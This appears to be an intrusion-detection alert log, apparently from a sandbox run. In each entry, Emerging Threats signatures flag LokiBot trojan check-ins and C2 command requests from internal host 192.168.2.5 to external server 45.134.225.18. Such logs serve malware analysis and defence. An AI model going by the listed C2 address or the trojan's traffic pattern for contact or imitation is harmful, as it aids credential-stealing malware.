                12/03/20-09:59:21.763173TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991280192.168.2.545.134.225.18
                12/03/20-09:59:21.763173TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991280192.168.2.545.134.225.18
                12/03/20-09:59:21.763173TCP2025381ET TROJAN LokiBot Checkin4991280192.168.2.545.134.225.18
                12/03/20-09:59:21.763173TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991280192.168.2.545.134.225.18
                12/03/20-09:59:22.039013TCP2570WEB-MISC Invalid HTTP Version String4991380192.168.2.545.134.225.18
                12/03/20-09:59:22.039013TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991380192.168.2.545.134.225.18
                12/03/20-09:59:22.039013TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991380192.168.2.545.134.225.18
                12/03/20-09:59:22.039013TCP2025381ET TROJAN LokiBot Checkin4991380192.168.2.545.134.225.18
                12/03/20-09:59:22.039013TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991380192.168.2.545.134.225.18
                12/03/20-09:59:22.321720TCP2570WEB-MISC Invalid HTTP Version String4991480192.168.2.545.134.225.18
                12/03/20-09:59:22.321720TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991480192.168.2.545.134.225.18
                12/03/20-09:59:22.321720TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991480192.168.2.545.134.225.18
                12/03/20-09:59:22.321720TCP2025381ET TROJAN LokiBot Checkin4991480192.168.2.545.134.225.18
                12/03/20-09:59:22.321720TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991480192.168.2.545.134.225.18
                12/03/20-09:59:22.620100TCP2570WEB-MISC Invalid HTTP Version String4991580192.168.2.545.134.225.18
                12/03/20-09:59:22.620100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991580192.168.2.545.134.225.18
                12/03/20-09:59:22.620100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991580192.168.2.545.134.225.18
                12/03/20-09:59:22.620100TCP2025381ET TROJAN LokiBot Checkin4991580192.168.2.545.134.225.18
                12/03/20-09:59:22.620100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991580192.168.2.545.134.225.18
                12/03/20-09:59:22.895658TCP2570WEB-MISC Invalid HTTP Version String4991680192.168.2.545.134.225.18
                12/03/20-09:59:22.895658TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991680192.168.2.545.134.225.18
                12/03/20-09:59:22.895658TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991680192.168.2.545.134.225.18
                12/03/20-09:59:22.895658TCP2025381ET TROJAN LokiBot Checkin4991680192.168.2.545.134.225.18
                12/03/20-09:59:22.895658TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991680192.168.2.545.134.225.18
                12/03/20-09:59:23.180118TCP2570WEB-MISC Invalid HTTP Version String4991780192.168.2.545.134.225.18
                12/03/20-09:59:23.180118TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991780192.168.2.545.134.225.18
                12/03/20-09:59:23.180118TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991780192.168.2.545.134.225.18
                12/03/20-09:59:23.180118TCP2025381ET TROJAN LokiBot Checkin4991780192.168.2.545.134.225.18
                12/03/20-09:59:23.180118TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991780192.168.2.545.134.225.18
                12/03/20-09:59:23.457048TCP2570WEB-MISC Invalid HTTP Version String4991880192.168.2.545.134.225.18
                12/03/20-09:59:23.457048TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991880192.168.2.545.134.225.18
                12/03/20-09:59:23.457048TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991880192.168.2.545.134.225.18
                12/03/20-09:59:23.457048TCP2025381ET TROJAN LokiBot Checkin4991880192.168.2.545.134.225.18
                12/03/20-09:59:23.457048TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991880192.168.2.545.134.225.18
                12/03/20-09:59:23.742579TCP2570WEB-MISC Invalid HTTP Version String4991980192.168.2.545.134.225.18
                12/03/20-09:59:23.742579TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991980192.168.2.545.134.225.18
                12/03/20-09:59:23.742579TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991980192.168.2.545.134.225.18
                12/03/20-09:59:23.742579TCP2025381ET TROJAN LokiBot Checkin4991980192.168.2.545.134.225.18
                12/03/20-09:59:23.742579TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991980192.168.2.545.134.225.18
                12/03/20-09:59:24.029588TCP2570WEB-MISC Invalid HTTP Version String4992080192.168.2.545.134.225.18
                12/03/20-09:59:24.029588TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992080192.168.2.545.134.225.18
                12/03/20-09:59:24.029588TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992080192.168.2.545.134.225.18
                12/03/20-09:59:24.029588TCP2025381ET TROJAN LokiBot Checkin4992080192.168.2.545.134.225.18
                12/03/20-09:59:24.029588TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992080192.168.2.545.134.225.18
                12/03/20-09:59:24.311742TCP2570WEB-MISC Invalid HTTP Version String4992180192.168.2.545.134.225.18
                12/03/20-09:59:24.311742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992180192.168.2.545.134.225.18
                12/03/20-09:59:24.311742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992180192.168.2.545.134.225.18
                12/03/20-09:59:24.311742TCP2025381ET TROJAN LokiBot Checkin4992180192.168.2.545.134.225.18
                12/03/20-09:59:24.311742TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992180192.168.2.545.134.225.18
                12/03/20-09:59:24.580388TCP2570WEB-MISC Invalid HTTP Version String4992280192.168.2.545.134.225.18
                12/03/20-09:59:24.580388TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992280192.168.2.545.134.225.18
                12/03/20-09:59:24.580388TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992280192.168.2.545.134.225.18
                12/03/20-09:59:24.580388TCP2025381ET TROJAN LokiBot Checkin4992280192.168.2.545.134.225.18
                12/03/20-09:59:24.580388TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992280192.168.2.545.134.225.18
                12/03/20-09:59:24.865822TCP2570WEB-MISC Invalid HTTP Version String4992380192.168.2.545.134.225.18
                12/03/20-09:59:24.865822TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992380192.168.2.545.134.225.18
                12/03/20-09:59:24.865822TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992380192.168.2.545.134.225.18
                12/03/20-09:59:24.865822TCP2025381ET TROJAN LokiBot Checkin4992380192.168.2.545.134.225.18
                12/03/20-09:59:24.865822TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992380192.168.2.545.134.225.18
                12/03/20-09:59:25.144987TCP2570WEB-MISC Invalid HTTP Version String4992480192.168.2.545.134.225.18
                12/03/20-09:59:25.144987TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992480192.168.2.545.134.225.18
                12/03/20-09:59:25.144987TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992480192.168.2.545.134.225.18
                12/03/20-09:59:25.144987TCP2025381ET TROJAN LokiBot Checkin4992480192.168.2.545.134.225.18
                12/03/20-09:59:25.144987TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992480192.168.2.545.134.225.18
                12/03/20-09:59:25.418056TCP2570WEB-MISC Invalid HTTP Version String4992580192.168.2.545.134.225.18
                12/03/20-09:59:25.418056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992580192.168.2.545.134.225.18
                12/03/20-09:59:25.418056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992580192.168.2.545.134.225.18
                12/03/20-09:59:25.418056TCP2025381ET TROJAN LokiBot Checkin4992580192.168.2.545.134.225.18
                12/03/20-09:59:25.418056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992580192.168.2.545.134.225.18
                12/03/20-09:59:25.699207TCP2570WEB-MISC Invalid HTTP Version String4992680192.168.2.545.134.225.18
                12/03/20-09:59:25.699207TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992680192.168.2.545.134.225.18
                12/03/20-09:59:25.699207TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992680192.168.2.545.134.225.18
                12/03/20-09:59:25.699207TCP2025381ET TROJAN LokiBot Checkin4992680192.168.2.545.134.225.18
                12/03/20-09:59:25.699207TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992680192.168.2.545.134.225.18
                12/03/20-09:59:25.987704TCP2570WEB-MISC Invalid HTTP Version String4992780192.168.2.545.134.225.18
                12/03/20-09:59:25.987704TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992780192.168.2.545.134.225.18
                12/03/20-09:59:25.987704TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992780192.168.2.545.134.225.18
                12/03/20-09:59:25.987704TCP2025381ET TROJAN LokiBot Checkin4992780192.168.2.545.134.225.18
                12/03/20-09:59:25.987704TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992780192.168.2.545.134.225.18
                12/03/20-09:59:26.276884TCP2570WEB-MISC Invalid HTTP Version String4992880192.168.2.545.134.225.18
                12/03/20-09:59:26.276884TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992880192.168.2.545.134.225.18
                12/03/20-09:59:26.276884TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992880192.168.2.545.134.225.18
                12/03/20-09:59:26.276884TCP2025381ET TROJAN LokiBot Checkin4992880192.168.2.545.134.225.18
                12/03/20-09:59:26.276884TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992880192.168.2.545.134.225.18
                12/03/20-09:59:26.552232TCP2570WEB-MISC Invalid HTTP Version String4992980192.168.2.545.134.225.18
                12/03/20-09:59:26.552232TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992980192.168.2.545.134.225.18
                12/03/20-09:59:26.552232TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992980192.168.2.545.134.225.18
                12/03/20-09:59:26.552232TCP2025381ET TROJAN LokiBot Checkin4992980192.168.2.545.134.225.18
                12/03/20-09:59:26.552232TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992980192.168.2.545.134.225.18
                12/03/20-09:59:26.840593TCP2570WEB-MISC Invalid HTTP Version String4993080192.168.2.545.134.225.18
                12/03/20-09:59:26.840593TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993080192.168.2.545.134.225.18
                12/03/20-09:59:26.840593TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993080192.168.2.545.134.225.18
                12/03/20-09:59:26.840593TCP2025381ET TROJAN LokiBot Checkin4993080192.168.2.545.134.225.18
                12/03/20-09:59:26.840593TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993080192.168.2.545.134.225.18
                12/03/20-09:59:27.120597TCP2570WEB-MISC Invalid HTTP Version String4993180192.168.2.545.134.225.18
                12/03/20-09:59:27.120597TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993180192.168.2.545.134.225.18
                12/03/20-09:59:27.120597TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993180192.168.2.545.134.225.18
                12/03/20-09:59:27.120597TCP2025381ET TROJAN LokiBot Checkin4993180192.168.2.545.134.225.18
                12/03/20-09:59:27.120597TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993180192.168.2.545.134.225.18
                12/03/20-09:59:27.396006TCP2570WEB-MISC Invalid HTTP Version String4993280192.168.2.545.134.225.18
                12/03/20-09:59:27.396006TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993280192.168.2.545.134.225.18
                12/03/20-09:59:27.396006TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993280192.168.2.545.134.225.18
                12/03/20-09:59:27.396006TCP2025381ET TROJAN LokiBot Checkin4993280192.168.2.545.134.225.18
                12/03/20-09:59:27.396006TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993280192.168.2.545.134.225.18
                12/03/20-09:59:27.677191TCP2570WEB-MISC Invalid HTTP Version String4993380192.168.2.545.134.225.18
                12/03/20-09:59:27.677191TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993380192.168.2.545.134.225.18
                12/03/20-09:59:27.677191TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993380192.168.2.545.134.225.18
                12/03/20-09:59:27.677191TCP2025381ET TROJAN LokiBot Checkin4993380192.168.2.545.134.225.18
                12/03/20-09:59:27.677191TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993380192.168.2.545.134.225.18
                12/03/20-09:59:27.958985TCP2570WEB-MISC Invalid HTTP Version String4993480192.168.2.545.134.225.18
                12/03/20-09:59:27.958985TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993480192.168.2.545.134.225.18
                12/03/20-09:59:27.958985TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993480192.168.2.545.134.225.18
                12/03/20-09:59:27.958985TCP2025381ET TROJAN LokiBot Checkin4993480192.168.2.545.134.225.18
                12/03/20-09:59:27.958985TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993480192.168.2.545.134.225.18
                12/03/20-09:59:28.245079TCP2570WEB-MISC Invalid HTTP Version String4993580192.168.2.545.134.225.18
                12/03/20-09:59:28.245079TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993580192.168.2.545.134.225.18
                12/03/20-09:59:28.245079TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993580192.168.2.545.134.225.18
                12/03/20-09:59:28.245079TCP2025381ET TROJAN LokiBot Checkin4993580192.168.2.545.134.225.18
                12/03/20-09:59:28.245079TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993580192.168.2.545.134.225.18
                12/03/20-09:59:28.536404TCP2570WEB-MISC Invalid HTTP Version String4993680192.168.2.545.134.225.18
                12/03/20-09:59:28.536404TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993680192.168.2.545.134.225.18
                12/03/20-09:59:28.536404TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993680192.168.2.545.134.225.18
                12/03/20-09:59:28.536404TCP2025381ET TROJAN LokiBot Checkin4993680192.168.2.545.134.225.18
                12/03/20-09:59:28.536404TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993680192.168.2.545.134.225.18
                12/03/20-09:59:28.822313TCP2570WEB-MISC Invalid HTTP Version String4993780192.168.2.545.134.225.18
                12/03/20-09:59:28.822313TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993780192.168.2.545.134.225.18
                12/03/20-09:59:28.822313TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993780192.168.2.545.134.225.18
                12/03/20-09:59:28.822313TCP2025381ET TROJAN LokiBot Checkin4993780192.168.2.545.134.225.18
                12/03/20-09:59:28.822313TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993780192.168.2.545.134.225.18
                12/03/20-09:59:29.098540TCP2570WEB-MISC Invalid HTTP Version String4993880192.168.2.545.134.225.18
                12/03/20-09:59:29.098540TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993880192.168.2.545.134.225.18
                12/03/20-09:59:29.098540TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993880192.168.2.545.134.225.18
                12/03/20-09:59:29.098540TCP2025381ET TROJAN LokiBot Checkin4993880192.168.2.545.134.225.18
                12/03/20-09:59:29.098540TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993880192.168.2.545.134.225.18
                12/03/20-09:59:29.394972TCP2570WEB-MISC Invalid HTTP Version String4993980192.168.2.545.134.225.18
                12/03/20-09:59:29.394972TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993980192.168.2.545.134.225.18
                12/03/20-09:59:29.394972TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993980192.168.2.545.134.225.18
                12/03/20-09:59:29.394972TCP2025381ET TROJAN LokiBot Checkin4993980192.168.2.545.134.225.18
                12/03/20-09:59:29.394972TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993980192.168.2.545.134.225.18
                12/03/20-09:59:29.658316TCP2570WEB-MISC Invalid HTTP Version String4994080192.168.2.545.134.225.18
                12/03/20-09:59:29.658316TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994080192.168.2.545.134.225.18
                12/03/20-09:59:29.658316TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994080192.168.2.545.134.225.18
                12/03/20-09:59:29.658316TCP2025381ET TROJAN LokiBot Checkin4994080192.168.2.545.134.225.18
                12/03/20-09:59:29.658316TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994080192.168.2.545.134.225.18
                12/03/20-09:59:29.949830TCP2570WEB-MISC Invalid HTTP Version String4994180192.168.2.545.134.225.18
                12/03/20-09:59:29.949830TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994180192.168.2.545.134.225.18
                12/03/20-09:59:29.949830TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994180192.168.2.545.134.225.18
                12/03/20-09:59:29.949830TCP2025381ET TROJAN LokiBot Checkin4994180192.168.2.545.134.225.18
                12/03/20-09:59:29.949830TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994180192.168.2.545.134.225.18
                12/03/20-09:59:30.221100TCP2570WEB-MISC Invalid HTTP Version String4994280192.168.2.545.134.225.18
                12/03/20-09:59:30.221100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994280192.168.2.545.134.225.18
                12/03/20-09:59:30.221100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994280192.168.2.545.134.225.18
                12/03/20-09:59:30.221100TCP2025381ET TROJAN LokiBot Checkin4994280192.168.2.545.134.225.18
                12/03/20-09:59:30.221100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994280192.168.2.545.134.225.18
                12/03/20-09:59:30.499972TCP2570WEB-MISC Invalid HTTP Version String4994380192.168.2.545.134.225.18
                12/03/20-09:59:30.499972TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994380192.168.2.545.134.225.18
                12/03/20-09:59:30.499972TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994380192.168.2.545.134.225.18
                12/03/20-09:59:30.499972TCP2025381ET TROJAN LokiBot Checkin4994380192.168.2.545.134.225.18
                12/03/20-09:59:30.499972TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994380192.168.2.545.134.225.18
                12/03/20-09:59:30.778699TCP2570WEB-MISC Invalid HTTP Version String4994480192.168.2.545.134.225.18
                12/03/20-09:59:30.778699TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994480192.168.2.545.134.225.18
                12/03/20-09:59:30.778699TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994480192.168.2.545.134.225.18
                12/03/20-09:59:30.778699TCP2025381ET TROJAN LokiBot Checkin4994480192.168.2.545.134.225.18
                12/03/20-09:59:30.778699TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994480192.168.2.545.134.225.18
                12/03/20-09:59:31.057081TCP2570WEB-MISC Invalid HTTP Version String4994580192.168.2.545.134.225.18
                12/03/20-09:59:31.057081TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994580192.168.2.545.134.225.18
                12/03/20-09:59:31.057081TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994580192.168.2.545.134.225.18
                12/03/20-09:59:31.057081TCP2025381ET TROJAN LokiBot Checkin4994580192.168.2.545.134.225.18
                12/03/20-09:59:31.057081TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994580192.168.2.545.134.225.18
                12/03/20-09:59:31.400097TCP2570WEB-MISC Invalid HTTP Version String4994680192.168.2.545.134.225.18
                12/03/20-09:59:31.400097TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994680192.168.2.545.134.225.18
                12/03/20-09:59:31.400097TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994680192.168.2.545.134.225.18
                12/03/20-09:59:31.400097TCP2025381ET TROJAN LokiBot Checkin4994680192.168.2.545.134.225.18
                12/03/20-09:59:31.400097TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994680192.168.2.545.134.225.18
                12/03/20-09:59:31.803027TCP2570WEB-MISC Invalid HTTP Version String4994780192.168.2.545.134.225.18
                12/03/20-09:59:31.803027TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994780192.168.2.545.134.225.18
                12/03/20-09:59:31.803027TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994780192.168.2.545.134.225.18
                12/03/20-09:59:31.803027TCP2025381ET TROJAN LokiBot Checkin4994780192.168.2.545.134.225.18
                12/03/20-09:59:31.803027TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994780192.168.2.545.134.225.18
                12/03/20-09:59:32.084681TCP2570WEB-MISC Invalid HTTP Version String4994880192.168.2.545.134.225.18
                12/03/20-09:59:32.084681TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994880192.168.2.545.134.225.18
                12/03/20-09:59:32.084681TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994880192.168.2.545.134.225.18
                12/03/20-09:59:32.084681TCP2025381ET TROJAN LokiBot Checkin4994880192.168.2.545.134.225.18
                12/03/20-09:59:32.084681TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994880192.168.2.545.134.225.18
                12/03/20-09:59:32.388118TCP2570WEB-MISC Invalid HTTP Version String4994980192.168.2.545.134.225.18
                12/03/20-09:59:32.388118TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994980192.168.2.545.134.225.18
                12/03/20-09:59:32.388118TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994980192.168.2.545.134.225.18
                12/03/20-09:59:32.388118TCP2025381ET TROJAN LokiBot Checkin4994980192.168.2.545.134.225.18
                12/03/20-09:59:32.388118TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994980192.168.2.545.134.225.18
                12/03/20-09:59:32.951838TCP2570WEB-MISC Invalid HTTP Version String4995080192.168.2.545.134.225.18
                12/03/20-09:59:32.951838TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995080192.168.2.545.134.225.18
                12/03/20-09:59:32.951838TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995080192.168.2.545.134.225.18
                12/03/20-09:59:32.951838TCP2025381ET TROJAN LokiBot Checkin4995080192.168.2.545.134.225.18
                12/03/20-09:59:32.951838TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995080192.168.2.545.134.225.18
                12/03/20-09:59:33.349041TCP2570WEB-MISC Invalid HTTP Version String4995180192.168.2.545.134.225.18
                12/03/20-09:59:33.349041TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995180192.168.2.545.134.225.18
                12/03/20-09:59:33.349041TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995180192.168.2.545.134.225.18
                12/03/20-09:59:33.349041TCP2025381ET TROJAN LokiBot Checkin4995180192.168.2.545.134.225.18
                12/03/20-09:59:33.349041TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995180192.168.2.545.134.225.18
                12/03/20-09:59:34.655264TCP2570WEB-MISC Invalid HTTP Version String4995280192.168.2.545.134.225.18
                12/03/20-09:59:34.655264TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995280192.168.2.545.134.225.18
                12/03/20-09:59:34.655264TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995280192.168.2.545.134.225.18
                12/03/20-09:59:34.655264TCP2025381ET TROJAN LokiBot Checkin4995280192.168.2.545.134.225.18
                12/03/20-09:59:34.655264TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995280192.168.2.545.134.225.18
                12/03/20-09:59:34.954467TCP2570WEB-MISC Invalid HTTP Version String4995380192.168.2.545.134.225.18
                12/03/20-09:59:34.954467TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995380192.168.2.545.134.225.18
                12/03/20-09:59:34.954467TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995380192.168.2.545.134.225.18
                12/03/20-09:59:34.954467TCP2025381ET TROJAN LokiBot Checkin4995380192.168.2.545.134.225.18
                12/03/20-09:59:34.954467TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995380192.168.2.545.134.225.18
                12/03/20-09:59:35.227269TCP2570WEB-MISC Invalid HTTP Version String4995480192.168.2.545.134.225.18
                12/03/20-09:59:35.227269TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995480192.168.2.545.134.225.18
                12/03/20-09:59:35.227269TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995480192.168.2.545.134.225.18
                12/03/20-09:59:35.227269TCP2025381ET TROJAN LokiBot Checkin4995480192.168.2.545.134.225.18
                12/03/20-09:59:35.227269TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995480192.168.2.545.134.225.18
                12/03/20-09:59:35.511750TCP2570WEB-MISC Invalid HTTP Version String4995580192.168.2.545.134.225.18
                12/03/20-09:59:35.511750TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995580192.168.2.545.134.225.18
                12/03/20-09:59:35.511750TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995580192.168.2.545.134.225.18
                12/03/20-09:59:35.511750TCP2025381ET TROJAN LokiBot Checkin4995580192.168.2.545.134.225.18
                12/03/20-09:59:35.511750TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995580192.168.2.545.134.225.18
                12/03/20-09:59:35.792503TCP2570WEB-MISC Invalid HTTP Version String4995680192.168.2.545.134.225.18
                12/03/20-09:59:35.792503TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995680192.168.2.545.134.225.18
                12/03/20-09:59:35.792503TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995680192.168.2.545.134.225.18
                12/03/20-09:59:35.792503TCP2025381ET TROJAN LokiBot Checkin4995680192.168.2.545.134.225.18
                12/03/20-09:59:35.792503TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995680192.168.2.545.134.225.18
                12/03/20-09:59:36.073485TCP2570WEB-MISC Invalid HTTP Version String4995780192.168.2.545.134.225.18
                12/03/20-09:59:36.073485TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995780192.168.2.545.134.225.18
                12/03/20-09:59:36.073485TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995780192.168.2.545.134.225.18
                12/03/20-09:59:36.073485TCP2025381ET TROJAN LokiBot Checkin4995780192.168.2.545.134.225.18
                12/03/20-09:59:36.073485TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995780192.168.2.545.134.225.18
                12/03/20-09:59:36.354127TCP2570WEB-MISC Invalid HTTP Version String4995880192.168.2.545.134.225.18
                12/03/20-09:59:36.354127TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995880192.168.2.545.134.225.18
                12/03/20-09:59:36.354127TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995880192.168.2.545.134.225.18
                12/03/20-09:59:36.354127TCP2025381ET TROJAN LokiBot Checkin4995880192.168.2.545.134.225.18
                12/03/20-09:59:36.354127TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995880192.168.2.545.134.225.18
                12/03/20-09:59:36.637676TCP2570WEB-MISC Invalid HTTP Version String4995980192.168.2.545.134.225.18
                12/03/20-09:59:36.637676TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995980192.168.2.545.134.225.18
                12/03/20-09:59:36.637676TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995980192.168.2.545.134.225.18
                12/03/20-09:59:36.637676TCP2025381ET TROJAN LokiBot Checkin4995980192.168.2.545.134.225.18
                12/03/20-09:59:36.637676TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995980192.168.2.545.134.225.18
                12/03/20-09:59:36.929339TCP2570WEB-MISC Invalid HTTP Version String4996080192.168.2.545.134.225.18
                12/03/20-09:59:36.929339TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996080192.168.2.545.134.225.18
                12/03/20-09:59:36.929339TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996080192.168.2.545.134.225.18
                12/03/20-09:59:36.929339TCP2025381ET TROJAN LokiBot Checkin4996080192.168.2.545.134.225.18
                12/03/20-09:59:36.929339TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996080192.168.2.545.134.225.18
                12/03/20-09:59:37.214521TCP2570WEB-MISC Invalid HTTP Version String4996180192.168.2.545.134.225.18
                12/03/20-09:59:37.214521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996180192.168.2.545.134.225.18
                12/03/20-09:59:37.214521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996180192.168.2.545.134.225.18
                12/03/20-09:59:37.214521TCP2025381ET TROJAN LokiBot Checkin4996180192.168.2.545.134.225.18
                12/03/20-09:59:37.214521TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996180192.168.2.545.134.225.18
                12/03/20-09:59:37.489367TCP2570WEB-MISC Invalid HTTP Version String4996280192.168.2.545.134.225.18
